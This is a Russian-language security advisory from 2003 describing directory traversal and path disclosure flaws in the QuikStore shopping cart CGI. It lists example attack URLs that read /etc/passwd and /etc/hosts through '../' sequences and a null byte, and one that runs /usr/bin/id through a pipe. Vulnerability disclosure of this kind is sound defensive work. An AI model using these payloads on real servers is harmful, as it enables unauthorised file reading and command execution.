Security Lab

Несколько уязвимостей в QuikStore shopping cart

Дата публикации:25.12.2003
Дата изменения:17.10.2006
Всего просмотров:4902
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: QuikStore Shopping Cart

Описание: Уязвимость обнаружена в QuikStore shopping cart. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может определить инсталляционный путь.

Удаленный пользователь может представить специально обработанный URL, содержащий '../' символы обхода каталога, чтобы просматривать произвольные файлы на системе с привилегиями процесса Web сервера.

Пример:

 http://[target]/quikstore.cgi?blah&template=../../. ./../../../../../../../etc/passwd%00.html
http://[target]/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/hosts
http://[target]/quikstore.cgi?blah&t emplate=../../../../../../../../../../../../usr/bin/id|
Также удаленный атакующий может определить инсталляционный путь:
 
http://[target]/cgi-bin/quikstore.cgi?store='

URL производителя: http://www.quikstore.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: QuikStore Shopping Cart Discloses Installation Path & Files to Remote